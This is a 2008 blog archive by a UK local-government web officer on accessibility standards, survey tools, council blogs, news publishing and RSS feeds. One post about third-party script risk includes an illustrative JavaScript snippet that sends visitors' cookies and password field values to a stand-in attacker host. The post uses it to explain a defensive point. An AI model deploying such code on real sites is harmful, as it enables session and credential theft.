Wednesday 31 December 2008

2008 online - some retrospectives

As the year draws to a close, here are a few retrospectives looking at the highlights of 2008 on the web, as well as some looking forward to 2009. Let me know if you've spotted any others worth including here.

Looking back...

The BBC's list of technology we have loved in 2008
From dongles to netbooks and services to applications, the BBC News technology team talk through what they have loved in the world of technology during 2008.
Google Zeitgeist 2008
Studying the aggregation of the billions of search queries that people type into the Google search box gives us a glimpse into the zeitgeist — the spirit of the times. We've compiled some of the highlights from Google searches around the globe and hope you enjoy looking back as much as we do.
The Register's jaw-droppers of 2008
Here is The Register's list of the worst, most cringe-worthy and jaw-dropping moments from the last 12 months that people would probably prefer to forget about. Nine wags of the finger plus - because it wasn't all bad this year - one tip of the hat, for balance.
Web Marketing Association's WebAwards 2008
Now in its 12th year, the WebAwards is the premier annual website award competition that names the best Web sites in 96 industries while setting the standard of excellence for all website development.
Time.com's 50 Best Websites 2008
Some are as useful as a GPS device, others aren't that useful but give you something to do when you had nothing planned for the day. Put them all together and they become TIME.com's 2008 picks for the best the Web has to offer.
Wired.com's 10 Best Galleries of 2008
A year of fast and furious pixel-pushing by the Wired.com photo department has finally come to a close. Now, as we slow down long enough to risk a look back, we've compiled a list of our favorites from the hundreds of galleries we ran in 2008.

and looking forward...

ReadWriteWeb's predictions for 2009
It's time for our annual predictions post, in which the ReadWriteWeb authors look forward to what 2009 might bring in the world of Web technology and new media.
Website Magazine's prediction for 2009
Website Magazine’s predictions for 2009 reveal that in spite of our current economy, the Web as a whole will continue to see strong growth and investment over the next year - a prediction that many industry analysts don't necessarily agree with.
Happy new year to you all!

Tuesday 30 December 2008

Slippery deadlines not good for business

I've had cause to think about this subject recently when we had a bit of a palaver over the public deadline for our online school enrolment forms. The forms were released in mid-November, with the deadline set at 24th December. A bit tight, I thought, but it's not my place to question such things. Christmas came and went, and I asked if it was appropriate to now remove the forms, given that the deadline had passed. Oh no, I was told, as by law we must accept applications until 15th March. I was then asked to amend the deadline date accordingly. The December deadline was a fake.

Although I can understand that it is useful to receive submissions as early as possible, to allow staff to manage their workloads, it seems a bit unreasonable to present a false deadline which is then discreetly extended. Many people will have put themselves to great inconvenience to complete this form in time, especially given the time of year, and to find that the deadline has been extended by almost three months will no doubt cause annoyance. There is also the risk that citizens will stop taking deadlines seriously, and may miss the window of opportunity in the future, where stated deadlines are genuine.

Far better, perhaps, to give the genuine deadline, but state that early submission is recommended. In some cases (for example, applying for grants from a limited fund) you could even suggest that early submissions will receive preference - that should get people moving!

Consultations

Similar issues have dogged some recent consultations that we've held, with deadlines being pushed back and back to try to squeeze out more responses. The problem here is that those who aimed for the original deadline may not have given themselves sufficient time to compose a full and accurate response. Those who replied early on are likely to be those who feel strongest about the subject of the consultation, and therefore the kind of people you want to listen to carefully and not annoy.

Of course, there are some instances where extending a deadline is sensible: where new information has come to light during a consultation, for example, or where a technical problem has prevented people from completing the process. In such cases, the reason for the extension should always be made clear. Otherwise, the organisation risks looking disorganised and unprofessional.

Project deadlines

The same applies to project deadlines. I recently finished a job which had to be completed by a certain date. No problem there - I'm used to tight deadlines. But when the delivery day arrived, the client came back with a few tweaks and some new requests, and it turned out the original deadline wasn't as crucial as first made out. These fake deadlines don't do the developer any favours - many things may get rushed or dropped entirely as a result. It's also usually a lot harder to change a final product than to factor in modifications as part of the build process. It's therefore far more productive to set milestones, where you deliver certain things by certain dates. This allows for a far smoother progression from planning to the final product.

Saturday 20 December 2008

Screen Reader survey

WebAIM are conducting a survey of the preferences of screen reader users.
"If you are a full-time, part-time, or even occasional screen reader user, please take a few minutes to complete the survey and provide us with a few details on your screen reader usage and preferences.... The results of the survey will be made public in a few months. We believe the results will be very useful to those who are developing accessible web content."
The results could be very enlightening, and I'd hope that anyone in a position to reply would do so to help inform best practices in designing websites sympathetic to the needs of these users.

I'll be sure to report the release of the results in the new year, so watch this space or head over to WebAIM to get it from the horse's mouth!

Thursday 18 December 2008

Survey Monkey useful features

I've been using Survey Monkey within my organisation for two months now (see my original post about its accessibility, which I'm still looking into). I must say I've been very impressed by the customer service - I've had a few questions which the (generally excellent) help section couldn't answer (mainly because contact with a person was necessary), and they've always been quick to respond.

I thought I'd mention a couple of things I've done since taking over the account. The lessons learned apply to any similar function, not just Survey Monkey.

SSL enabled

Firstly, I was surprised to see that the account did not have SSL enabled. This costs just $100 extra a year which, for an organisation such as mine, is peanuts. Compare that with the disasters that could await if not using a secure protocol and it's a no-brainer. Sadly this only really came to my attention when I heard about a survey we'd run to gather parents' opinions on school buildings. A local parent council blog had flagged up the potential security risk, and quite rightly so. We were asking for a few personal details, although to be fair these were not mandatory. Even so, those unaware of the difference between http and https may not have appreciated the risks (however small) and that's not really on. Needless to say we've now upgraded, so people's responses are collected securely at their end and the results are downloaded securely at this end.

Friendly URLs

Secondly, a nice "courtesy feature"* is the ability to request friendly URLs. So instead of the usual string of alphanumeric characters you can get something that actually makes sense (e.g. www.surveymonkey.com/mysurvey). This is really useful, especially if there's a chance that people may need to type in the address, or if you want to refer to it in print. To underline the great customer service, I requested one to be set up and it took just a couple of hours.

Something to be aware of, if also using SSL, is that your users will need to include the https:// at the start of the URL. If they just type the address starting with the www... they'll be directed to the insecure version. Survey Monkey does not offer the ability to always redirect to the secure version, which they say is for the benefit of any systems that cannot access the secure pages.

*Presumably a "courtesy feature" is something they'll usually do, but aren't obligated to. Hopefully, then, they'll continue to offer this (and for free).
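Returning to the https point for a moment: on pages you host yourself, the usual fix is a redirect from the insecure version to the secure one. Below is a minimal client-side sketch - illustrative only, since you obviously can't add script to Survey Monkey's own pages, and a server-side rule is preferable where available:

  // If this page has been reached over plain http, bounce the
  // visitor to the https equivalent of the same address.
  if (window.location.protocol === "http:") {
    window.location.replace("https://" + window.location.host +
        window.location.pathname + window.location.search);
  }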

Loop to start

You've got various options for where to direct the user on completion of the survey (e.g. to a thank-you page, another website, or even closing the window). Another option, though, is to loop the user back to the start of the survey. This proved useful recently when we used Survey Monkey as the basis for an audit. Each auditor would typically be looking at 5 or more things, each requiring a unique response, so once one audit was complete they'd be going straight back into the survey to do another. The 'loop to start' function was, obviously, the perfect solution for this.

Invitations by e-mail

A tremendously useful feature is the ability to set up Survey Monkey to e-mail a list of recipients with an invitation to complete your survey. Each recipient gets a unique URL, enabling the system to track who has and hasn't responded. This then means that you can easily send reminders targeted only at those who are yet to respond.
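Under the bonnet, the mechanics are presumably something like the sketch below. This is my guess at the general shape, not Survey Monkey's actual implementation - the function names and the 'r' parameter are invented for illustration:

  // Give each recipient a random token and build their personal
  // survey URL. A response arriving with a token can be matched
  // back to the address it was sent to, and reminders sent only
  // to those still marked as not having responded.
  // (Math.random is fine for a sketch; a real system would use a
  // stronger source of randomness.)
  function makeToken() {
    return Math.random().toString(36).slice(2, 12);
  }

  function buildInvites(surveyUrl, recipients) {
    var invites = {};
    for (var i = 0; i < recipients.length; i++) {
      var token = makeToken();
      invites[token] = {
        email: recipients[i],
        url: surveyUrl + "?r=" + token,
        responded: false
      };
    }
    return invites;
  }

  var invites = buildInvites("https://www.surveymonkey.com/mysurvey",
      ["parent1@example.com", "parent2@example.com"]);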

I thought it worth mentioning this function in the privacy statement that I am developing to accompany any surveys, and accordingly included this on the front page of the survey:
If you arrived at this survey via an e-mail invitation, it will be possible for us to link your answers with your e-mail address. Any information you provide will be kept secure and only used for evaluating the results of the survey.

Tuesday 16 December 2008

Government 2.0 - current initiatives wiki

I've just been looking at a wiki of current initiatives for Government 2.0 - that is, government's use of social media.

At the moment it has a heavy leaning towards US and Canadian initiatives, although there is a smattering of international efforts too. There are some great examples, including:
  • Wikis to improve internal collaboration
  • Geo-tagged images on Flickr
  • Podcasts to reach new audiences
  • Lots of use of blogs, Facebook, Twitter, YouTube, Second Life, etc.
Hopefully this wiki will continue to grow, and the intention is for it to eventually offer best practices. Kudos to Mike Kujawski for creating the wiki, as well as to Jose Alonso (W3C eGovernment Interest Group) for the heads-up.

Monday 15 December 2008

Staying alert - who's talking about your site?

I've recently started using Google Alerts:
Google Alerts are email updates of the latest relevant Google results (web, news, etc.) based on your choice of query or topic. Some handy uses of Google Alerts include:
  • monitoring a developing news story
  • keeping current on a competitor or industry
  • getting the latest on a celebrity or event
  • keeping tabs on your favorite sports teams
I set up a number of alerts based on various topics of interest and the emails started coming thick and fast (I opted for 'as-it-happens' alert frequency in most cases, but you can also specify daily or weekly digests).

What has been most useful is hearing about the various blogs which are talking about the organisation and its website, as well as seeing which sites are linking to us. A large proportion of the alerts come from news sources too, so I can also keep tabs on the media. Not only is this an important Comms issue, but it is also a crucial step in becoming proactive with Web 2.0 technologies in general.

Company Buzz is another interesting application, this time for users of LinkedIn. Powered by Twitter, this application pulls in links to sites that are talking about your company (for better or for worse!). It also gives you a list of Buzz Words.

With these sorts of tools, as well as through monitoring prominent local and national blogs, I'm hoping to build up a robust 'early-warning system' to help us react to the conversations that are taking place. Once this is well established, I'll be looking to see how we can work it into our strategies for more effectively engaging with web technologies across the board.

After all, if we wish to engage with the conversations taking place, we need to know where they are and what people are saying.

Thursday 11 December 2008

WCAG 2.0 gets the final thumbs up

Some exciting news...
Today W3C announced a new standard that will help Web designers and developers create sites that better meet the needs of users with disabilities and older users. Drawing on extensive experience and community feedback, the Web Content Accessibility Guidelines (WCAG) 2.0 improve upon W3C's groundbreaking initial standard for accessible Web content, apply to more advanced technologies, and are more precisely testable.
It's taken nearly 8 years, but we finally have a follow-up to the groundbreaking but desperately outdated first version of the international guidelines for creating accessible websites.

I've previously been in contact with the Central Office of Information to find out how quickly they'll be recommending that public sector organisations start adopting the new guidelines. Now that WCAG 2.0 is finalised, we'll hopefully see the Delivering Inclusive Websites document updated by mid-2009, but there's nothing stopping organisations pre-empting this, and indeed I'd hope most will already be doing just that.

We can now look forward to designers across the globe rolling up their sleeves and getting stuck into the new standards, and I'm sure the collaboration that will come from this will make it a smooth transition. A starter for ten can be found in the WCAG 2.0 resources over at the Web Standards Project.

Good luck!


Friday 5 December 2008

Local government blogs

When I hear people in my organisation talk about starting an official blog, I am split in two. Half of me is excited by the prospect, whilst the other half cringes at the risks.

Headstar's E-Government Bulletin has an interesting report on the recent E-Democracy 2008 conference, addressing the issue of blogging and digital dialogues. This got me thinking about the subject (you'll see my initial thoughts at the end of that very article), and I've since been looking further into the world of public sector (and more specifically, local government) blogs.

Some examples

Technorati reports that it is tracking the existence of 112 million blogs. Surprisingly, then, it was a little difficult to find really good examples of well-executed local government blogs. Here are some examples, though, listing the good and the bad points of each:

Kent County Council Leader's Blog

Plus points:

  • Last post just 9 days old at the time of writing, with 3 or 4 posts a month on average
  • The posts seem to relate well to current events
  • The post titles are brief but descriptive
  • The posts offer relevant hyperlinks
  • Commenting not available, but an e-mail link offered
  • Some honest and personal views

Minus points

  • A very obvious political agenda
  • The only image is one of the blogger himself
  • No RSS feed available

London Borough of Lambeth Leader's Blog

Plus points

  • Well established blog - archive going back to October 2006
  • Good range of topics covered

Minus points

  • Erratic frequency - some months have 5+ posts, other months have none
  • The more recent posts appear at the bottom - big mistake!
  • Lack of images makes the pages very samey and uninspiring
  • No RSS feed available

Wiltshire Extranet Blog

Plus points

  • One post each and every week
  • All the trappings of a proper blog - archives, calendar, feeds, feedback

Minus points

  • Bizarrely, each post is a report of what the blogger will be doing, with no obvious follow-ups
  • An internal blog, meant for internal readers, available externally
  • No information about the blog or blogger (presumably due to its internal nature)

Durham County Council Leader's blog

Plus points

  • Blog is combined with a diary to view upcoming appointments
  • Option to add comments, and the blogger has even responded to one
  • Fairly regular posts (although it has only been running for less than 2 months)

Minus points

  • The blog launched in October, yet the 'archive' looks like it goes back to January. You can't click on any of the months prior to October, adding to the confusion.
  • Again, lack of images makes for dull pages.
  • Not only a lack of corporate branding, but also a horrendous pink theme (OK, that one is subjective)

Pseudo-blogs

One issue which arose during my search related to the design and functionality of the blogs I encountered. Many seemed to have been integrated into the main corporate website, and in many cases were not technically blogs in the typical sense, but rather normal static web pages presenting chronological articles. Whilst there is nothing inherently wrong with this, it does rather stretch the blog metaphor. A typical blog has features such as categories and labels for filtering articles; the ability to comment on posts; RSS feeds or subscriptions to easily access new posts; automatically generated archives; and all manner of other widgets including polls, related links and tag clouds. These are important elements which define a blog as a Web 2.0 technology.

Lessons learned

The Durham blog is a great example of understanding the blog metaphor and adapting it to the interests of the users. By incorporating a diary, and then blogging about the events afterwards, you have a great premise for generating interest and engagement.

Lack of images was a big problem across the board, and is in fact an issue common with many blogs worldwide. A local gov organisation should have access to a wealth of stock photos which could be thrown in, where relevant, to liven up the pages. A crucial element of engaging the public is to make your channels of communication interesting, and the use of images seems like an essential ingredient in this.

The regularity of posts seemed to vary wildly, but a key point is the importance of consistency. One post per week is fine if that offers a summary of the week's events. Any less than that and the blog risks looking sparse and unresponsive to events. A greater frequency might be appropriate but it has to be sustainable. Probably far better to stick to the weekly format unless urgent issues arise.

Although many of the features of the traditional blog are perhaps overkill, some key functions should remain. Allowing comments makes perfect sense - after all, the point of the blog is to create a dialogue. Archiving is obviously a must - that's one of the things that makes it a blog. Promotion is a key issue, as the blog must be easy to find. RSS feeds will then make it easy for people to follow.
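On that last point, making a feed easy to follow starts with making it discoverable. Browsers and feed readers will pick up a feed automatically from a single line in the page head - a sketch, with the URL invented for illustration:

  <link rel="alternate" type="application/rss+xml"
        title="Council news" href="http://www.example.gov.uk/news/rss.xml" />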

Conclusion

Blogs provide an excellent channel of communication with your citizens, and can very easily fit in with your other comms strategies. They are incredibly easy to set up, but far from easy to maintain to a high quality. They'll demand lots of time, thought, creativity and buy-in. Because of this, the failure rate is likely to be high, but the rewards are there for the successful few.

Tuesday 2 December 2008

British Standard for Web Accessibility - draft

The British Standards Institution (BSI) have released the first draft of the new British Standard for Web Accessibility - BS 8878 - for public consultation until 1st Feb 2009.
BS 8878 will suggest a practical process for ensuring that the private and public sectors successfully produce digital design that is inclusive of as many of the user population as possible. While disabled people are intended to be the key beneficiaries of the new approach, people whose first language is not English and everyone who reads web content over a mobile device stand to benefit from an approach that encourages the development of ‘accessible user experiences’.

Building upon the Publicly Available Specification "Guide to Good Practice in Commissioning Accessible Websites" (PAS78), the new British Standard will address the business case for accessibility, explaining the relevance of the Disability Discrimination Act and looking at how organisations should attain accessibility by allocating appropriate resources and choosing technologies and developers wisely.

It also talks about the user's enjoyment of a website - taking the idea of accessibility to a new level. Julie Howell, chair of the committee which has developed the standard, said:
"Access, use and enjoy are the three terms we use," [...] "Access is about the ability to reach the content; usability is about the ability to complete a task; and enjoyment is about having an enjoyable user experience and wanting to go back to that site. In the past we thought very functionally about what disabled users wanted."

Out-law.com states that the final version is expected by Summer 2009. Once I've digested the 46-page document I'll post my thoughts here (as well as submitting them to BSI, who emphasise that all comments will contribute to the development of BS 8878, helping to shape the standard).

Monday 1 December 2008

WordPress and accessibility

I'll shortly be publishing an article on blogs in the public sector (edit: now available), but for now here's a link to an interesting article on WordPress and accessibility. As author Mike Cherim points out, one of the sites named in the WCAG 2.0 implementation report (and indeed reaching triple-A standard) was based on WordPress, suggesting that the platform can produce very accessible results. There are a couple of issues to be aware of, though, so if you're developing sites with WordPress you'd better read this.

Monday 24 November 2008

Google Analytics - the risks of 3rd party script

The Register has recently reported on the potential security vulnerability of using Google Analytics, and as we use this for various sites I thought it worth exploring a little further, especially as there are wider implications around linking to any third-party JavaScript code.

The essence of the Register's article, Google Analytics - Yes, it is a security risk, is that any third-party JavaScript you include on your pages could open you up to vulnerabilities. You are essentially at the mercy of the owners of that code, trusting them not to do anything malicious. And there are plenty of things they could do, including stealing session cookies and form data, or even executing a 'cross site script proxy' attack, which could surrender control of a user's login session.
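To make that concrete, here is roughly the sort of thing a hostile (or compromised) third-party script could do once your page includes it - it runs with exactly the same privileges as your own code. The attacker.example address and the field name are, of course, invented:

  // Exfiltrate the visitor's cookies for this site via a simple
  // image request to a server the attacker controls.
  new Image().src = "http://attacker.example/steal?c=" +
      encodeURIComponent(document.cookie);

  // Quietly harvest a form field just before the user submits it.
  var form = document.forms[0];
  if (form) {
    form.onsubmit = function () {
      var field = this.elements["password"]; // hypothetical field
      if (field) {
        new Image().src = "http://attacker.example/steal?v=" +
            encodeURIComponent(field.value);
      }
    };
  }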

So how big is the risk? There are a couple of factors to consider:

Firstly, how well can the script owner be trusted? A company such as Google can probably be trusted quite a bit, although we're not just talking about the integrity of the company's ethics. We also need to consider how seriously they take security themselves - how stringent are their own practices? Again, we can be fairly sure that Google is pretty hot on best security practices, so the risk is relatively low. The same might not be true of other third party sites.

Secondly, how big a target is your site? The case referred to in the Register's story was Barack Obama's website. That site is obviously going to be a huge target for potential hackers, with security an immensely important subject. Sites with a lower profile can reasonably be assumed to be less of a target, although the risks still cannot be discounted entirely.

In a recent forum post discussing this issue, the following advice was given:
if you must use external JScript, make sure it is a trusted source, and by trusted, I don't just mean the company and their reputation, but also their own security practises, and do not under any circumstances link 3rd party JScript to a "secured" or sensitive area of a site
This seems to be pretty sensible, and is something we will need to consider from now on, not just in relation to Google Analytics, but when looking at linking to any third party script. Better safe than sorry...

Friday 21 November 2008

Keeping up with your own news

Our organisation has been in the news a fair bit recently. Well, actually, being a local authority we're always in the local news and the coverage is rarely positive (and often inaccurate too). But what I've been increasingly concerned about recently is the fact that the local media keep getting there first - reporting on stories hours, sometimes days, before our own website publishes the information.

The case in point was demonstrated this week when my organisation made some important (and controversial) decisions on school closures. I'm assuming the press were notified through the usual channels, and the news made it onto their websites within hours. We, however, didn't post an update on our website until the following afternoon.

The major problem with this, apart from it looking generally poor, is that it forces citizens to look elsewhere for information that we should be providing them with. This also means that the information they eventually find will probably have been edited, and is usually accompanied by a long string of unmoderated user comments positing all sorts of theories and opinions, many of which are stultifyingly ill-informed (thanks to Chris Morris for that excellent phrase). And of course, most people will probably look to the media first anyway, but perhaps then come to our site to check the facts and to get background information. If we're not providing content to coincide with news stories appearing elsewhere, and making it prominent from the homepage, we're really failing our users.

It's not that we have a lack of news either. I recently encountered a problem where important press releases were too quickly getting bumped off the home page (which only displays the 3 most recent releases, with a link through to the rest). Our school closures story, for example, got bumped within hours by two stories about awards ceremonies and another about tips for Christmas shopping. Whilst non-critical releases are great (SOCITM's 2008 Better Connected report commended the 76% of local authority sites which featured 'good current news beyond a report of a council meeting or decision'), if the softer stories are drowning out the more important ones we are again failing our users.

This is all compounded by the fact that our site does not support RSS feeds or news alerts, so we're not actively 'pushing' these stories in the first place (SOCITM found that only 33% of local authority sites do either of these things). Our news stories are given good prominence on the homepage, but unless you actually visit our site you probably won't find our press releases.
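For anyone unfamiliar with what is actually involved, an RSS feed is just a small XML document that the site regenerates as news is published. A minimal RSS 2.0 sketch for a press release might look like this (titles and URLs invented for illustration):

  <?xml version="1.0" encoding="UTF-8"?>
  <rss version="2.0">
    <channel>
      <title>Council press releases</title>
      <link>http://www.example.gov.uk/news/</link>
      <description>The latest news from the council</description>
      <item>
        <title>Decision made on school closures</title>
        <link>http://www.example.gov.uk/news/school-closures</link>
        <pubDate>Thu, 20 Nov 2008 09:00:00 GMT</pubDate>
        <description>A summary of the decision and next steps.</description>
      </item>
    </channel>
  </rss>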

Another problem (which impacts the speed of all developments on our site) is that content often has to go via various levels of approval before it can be published. By speeding up this approval process, or by further devolving editorial authority, we could drastically improve our ability to react to news and events more quickly and effectively. Only then can we consider ourselves to be, as the Better Connected report puts it, newsworthy.

Key points:
  • Get press releases online as quickly as the media, or quicker
  • Make them prominent on the homepage, for a reasonable period of time
  • Explore other methods of distributing news - RSS, alerts, e-mail digests, SMS, news tickers etc

Wednesday 19 November 2008

Live web broadcasts and the BBC licence fee

The hot debate surrounding the BBC licence fee is about to get even more complicated with the BBC's announcement that yet more channels are set to be broadcast live online.

An item on the BBC website today reported:
BBC shows including EastEnders, Heroes and Never Mind The Buzzcocks will be available to watch live online from next week, the BBC has announced.

BBC One and BBC Two will be streamed live - just as BBC Three, BBC Four, CBBC, CBeebies and BBC News are already broadcast on their channel websites.

Director of BBC vision Jana Bennett said this "completes our commitment" to make channels available online.

The live simulcast for both channels will be available from 27 November.

If viewers miss any programmes they will be available for up to a week on the BBC iPlayer.

"From 27 November licence fee payers will be able to watch BBC programmes live wherever they are in the UK on their computers, mobile phones and other portable devices," Ms Bennett said.

According to media watchdog Ofcom, the number of people watching TV on the internet has doubled in the last 12 months.

In 2006, Channel 4 became the first major UK TV channel to be simulcast on the internet.

As The Register points out:
Note "licence fee payers" in that quote. While catching up with shows on iPlayer does not require a TV licence, watching any live broadcast - including over the internet - does.

Big headaches lurk for enforcement authorities if live online viewing enters the mainstream: will cafes that offer Wi-Fi be required to buy a business TV licence in case their customers watch a bit of BBC One, for example?
Might this therefore also affect public libraries, which provide free internet access? And how far will the TV licence enforcers go? We have already seen mobile phone companies passing on details of customers who have purchased 3G or wireless-enabled handsets, so it's not a huge leap to imagine ISPs doing the same (if they're not already doing so).

Then comes the ambiguity of what constitutes a 'live' broadcast. A lot of 'live' streamed content is actually on a delay - a fact proven when you lose the stream and the player reconnects, taking you back to the exact second where you left off. TV Licensing has previously stated that even delayed 'hour plus one' type services would count as live, so we can see how ambiguous this could get.

Finally, how obvious will the difference be between 'live' content (requiring a licence) and non-live content (currently everything on iPlayer - not requiring a licence)? If the difference is subtle, it could make it very easy for people to break the law without even realising it.

Monday 17 November 2008

WCAG 2 - claiming conformance

Anyone wanting to claim conformance to the nascent WCAG 2.0 will have to provide a specific conformance claim on their site, according to the documentation found at www.w3.org/TR/WCAG20:
Required components of a conformance claim

Conformance claims are not required. Authors can conform to WCAG 2.0 without making a claim. However, if a conformance claim is made, then the conformance claim must include the following information:
  1. Date of the claim
  2. Guidelines title, version and URI "Web Content Accessibility Guidelines 2.0 at {URI of final document}"
  3. Conformance level satisfied: (Level A, AA or AAA)
  4. A concise description of the Web pages such as a list of URIs for which the claim is made, including whether subdomains are included in the claim.
    • Note 1: The Web pages may be described by list or by an expression which describes all of the URIs included in the claim.
    • Note 2: Web-based products that do not have a URI prior to installation on the customer's Web site may have a statement that the product would conform when installed.
  5. A list of the Web content technologies relied upon.
    • Note: If a conformance logo is used, it would constitute a claim and must be accompanied by the required components of a conformance claim listed above.
Note - the concept of a technology baseline has been dropped.

The Understanding Conformance page gives some examples of wording. In the spirit of this, I decided to produce such a claim for my own Pretty Simple web site, which was used in the implementation report as part of the WCAG 2.0 Candidate Recommendation stage and has, since getting the thumbs up from the WCAG 2.0 Working Group, been claiming conformance.
On September 25th 2008, all Web pages found at www.prettysimple.co.uk conform to the Web Content Accessibility Guidelines 2.0 at www.w3.org/TR/WCAG20. Level Double-A conformance.

The web content technology relied upon is XHTML 1.0 (Strict).

The technologies used but not relied upon are: JavaScript, CSS 2.0, Flash.
I wasn't sure about where to put CSS, but felt that, as it is utilised purely for presentation and not content, it shouldn't be considered a 'relied-upon' technology. The Flash banners are only for presentation, and have images with alt attributes behind them, so are certainly not relied upon. Equally, the JavaScript used to bring in the RSS feeds on the Links page is accompanied by noscript links, so is not essential for any user.
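For anyone unfamiliar with that pattern, it boils down to something like this - a simplified sketch rather than the exact markup from my Links page, with the URLs invented:

  <!-- The script writes the feed items into the page... -->
  <script type="text/javascript" src="http://www.example.com/feed-widget.js"></script>
  <!-- ...while non-script users get an equivalent link instead,
       so the content is never dependent on JavaScript. -->
  <noscript>
    <p><a href="http://www.example.com/feed/">Read the latest
    items on the source site</a></p>
  </noscript>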

I could also go into detail about the Level AAA Success Criteria that I meet, and may do this at some point in the future, along with details of the various user agents with which I have tested the site.

One question that has arisen is when I might be expected to update the statement. Presumably the next time I test the entire site, although given that I am making no significant changes to the pages - and only adding content occasionally - I might be forgiven for simply updating the date every time I update the website.

Thursday 13 November 2008

World Usability Day

Today was World Usability Day. As the website puts it:
It's about "Making Life Easy" and user friendly. Technology today is too hard to use. A cell phone should be as easy to access as a doorknob. In order to humanize a world that uses technology as an infrastructure for education, healthcare, transportation, government, communication, entertainment, work and other areas, we must develop these technologies in a way that serves people first…

World Usability Day was founded in 2005 as an initiative of the Usability Professionals' Association to ensure that services and products important to human life are easier to access and simpler to use.
A nearby event was put on by local user experience consultancy User Vision, and I've just got back from a very interesting few hours there.

A really interesting presentation by Monty Lilburn introduced us to Loadstone GPS - open source software that utilises GPS on mobile phones, resulting in easy-to-follow directions of significant use to blind and visually impaired people (through the use of mobile screen readers such as Talks or Mobile Speak). We were also shown a great little video that they had made, showing Lilburn navigating his way through Edinburgh using the software on his phone. It can (for now) be seen at www.tinyurl.com/6cukzt.

Elsewhere we saw a demonstration of eye-tracking software, which User Vision's Jamie advocated as a very powerful tool able to give you some very meaningful results; Donna was letting people get their hands on her iPhone to see how easy to use it is (or isn't); Ross was giving people a driving test challenge with the latest in iTV software; and I had an interesting chat with their accessibility consultant Mark about everything from WCAG 2.0 to the lack of a decent legal precedent in the UK which would help underline the importance of accessibility standards.

Thanks to Chris, Laura and everyone else at User Vision for an interesting afternoon.

Update - User Vision now have a press release about the day on their website, along with some useful links and a handful of photos (including one of the back of my head!).

Wednesday 12 November 2008

WCAG 2.0 and Delivering Inclusive Websites

In June 2008 the Central Office of Information (COI) produced the Delivering Inclusive Websites guidance:
These guidelines are for public sector website owners and digital media project managers wishing to deliver inclusive, accessible websites. This document sets out the minimum standard of accessibility for public sector web content and web authoring tools. It recommends a user-centred approach to accessibility, taking account of user needs in the planning and procurement phases of web design projects.
These guidelines currently make reference to WCAG 1.0, so I wanted to know what would happen once WCAG 2.0 is approved. There is a paragraph which refers to this, but it is a little vague:
At the time of writing, version 1.0 of the Web Content Accessibility Guidelines is the current standard for web accessibility. At such time that version 2.0 becomes a W3C Recommendation, this policy will be reviewed within six months. Consideration will be given to the adoption of version 2.0 as the minimum standard for public sector websites.
Our organisation is currently looking at options for a new web content management system. As such a procurement would be a long-term commitment, I'm keen to know that the goalposts are not going to move halfway through implementing a solution. Whilst it's true that sites built to conform to WCAG 1.0 should meet WCAG 2.0 without too many problems, I feel it is crucial that the minimum standards are recorded in black and white in any requirements documentation.

I have therefore submitted the following enquiry to the COI:
With WCAG 2.0 currently at Proposed Recommendation stage, and due to be approved by Christmas, what plans are there to modify the information provided as part of the "Delivering inclusive websites" guidelines? What are the timescales involved i.e. how soon should the public sector be building websites according to WCAG 2.0 instead of WCAG 1.0?
and will post the reply here when received.

Update 16th Nov

Reply from COI:
We plan to review adoption of WCAG 2.0 with the public sector community. It is unclear at this stage whether doing so is in our best interests. For example, the new AA requirement for audio description and subtitles for every video would mean that Level-A would be the only realistic option - and then the risk is that no-one implements the other Level-AA requirements.

We would also like to see what the European Commission thinks about the new standard. Anything we do would have to be in line with their thinking.

I don't think there's anything stopping people building to WCAG 2.0. Am I right in thinking that any website that's AA according to version 2.0 is automatically v1.0 compliant?
An extract from my response is as follows:
Unfortunately I don't think it is the case that WCAG 2.0 compliant sites will meet WCAG 1.0, at the equivalent conformance level, by default. There are many WCAG 1.0 checkpoints with the 'until user agents' caveat that WCAG 2.0 has now omitted, due to the conditions being met. Plus there are obvious changes such as no longer requiring access keys or metadata to add semantic information to pages, or no longer being required to avoid deprecated features. If you therefore designed according to WCAG 2.0, I would imagine that you might fail against WCAG 1.0 on these sorts of points.

Regarding your point about unrealistic levels of compliance - I know it has been suggested elsewhere that a phased approach might be most appropriate, to account for the cost, time and expertise required to, for example, produce compliant time-based media. There may also be potential to describe the transitional approach in the conformance claim statement (which is required for any site claiming WCAG 2.0 conformance).
Hopefully we'll see some new guidance soon.

Friday 7 November 2008

Getting feeds from your own site

I recently wanted to pull in the news items from our main corporate site onto a partner site, on an existing 'news' page which already pulls in RSS Feeds from other major content providers such as the BBC, Learning Teaching Scotland and the Scottish Government. The trouble is, our corporate site does not generate such feeds, so until now I've had to manually input each new press release.

However, I'd heard that it was possible to grab content from pages even where those pages are not set up to offer RSS feeds.

A bit of searching brought me to feedity.com. This site allows you to easily set up an RSS feed based on the content of your site, and on inputting the target URL it quickly came up with a list of press releases, exactly as intended. You can also fiddle with the results if they're not as expected.

Once you've got your RSS feed, the next task is to pull it into your page. I've used JavaScript to do this, using a handy script generator found at itde.vccs.edu/rss2js.
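For the curious, the idea boils down to something like the sketch below. This is a simplified, hand-rolled version rather than the rss2js output itself; note that the browser's same-origin policy means a page can only fetch feeds from its own domain this way, which is exactly why remote generator services are handy for third-party feeds:

  // Fetch an RSS feed from our own domain and append its items,
  // as links, to an existing list element on the page.
  function loadFeed(feedUrl, listId, maxItems) {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", feedUrl, true);
    xhr.onreadystatechange = function () {
      if (xhr.readyState !== 4 || xhr.status !== 200) return;
      var list = document.getElementById(listId);
      var items = xhr.responseXML.getElementsByTagName("item");
      for (var i = 0; i < items.length && i < maxItems; i++) {
        var title = items[i].getElementsByTagName("title")[0];
        var link = items[i].getElementsByTagName("link")[0];
        var anchor = document.createElement("a");
        anchor.href = link.firstChild.nodeValue;
        anchor.appendChild(
            document.createTextNode(title.firstChild.nodeValue));
        var entry = document.createElement("li");
        entry.appendChild(anchor);
        list.appendChild(entry);
      }
    };
    xhr.send(null);
  }

  // Usage, once the page has loaded:
  // loadFeed("/news/feed.xml", "news-list", 5);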

The end result can be seen at egfl.net/news. You'll see I've got feeds coming in from the sites mentioned above, as well as the newly generated feed from our own council site. There is of course also a noscript alternative linking to the pages with the news items.

Hey presto - no more updating manually!

Edit - there are other similar services to the ones I've mentioned here. For generating RSS feeds, also see Feed43, Dapper or FeedYes. For inserting the feeds into your page, also see RSSinclude or Dynaweb RSS Pal.

PS - don't forget that linking to third-party JavaScript carries a certain degree of risk. See my post about security and Google Analytics for more info.

Thursday 6 November 2008

Public feedback - not a monologue

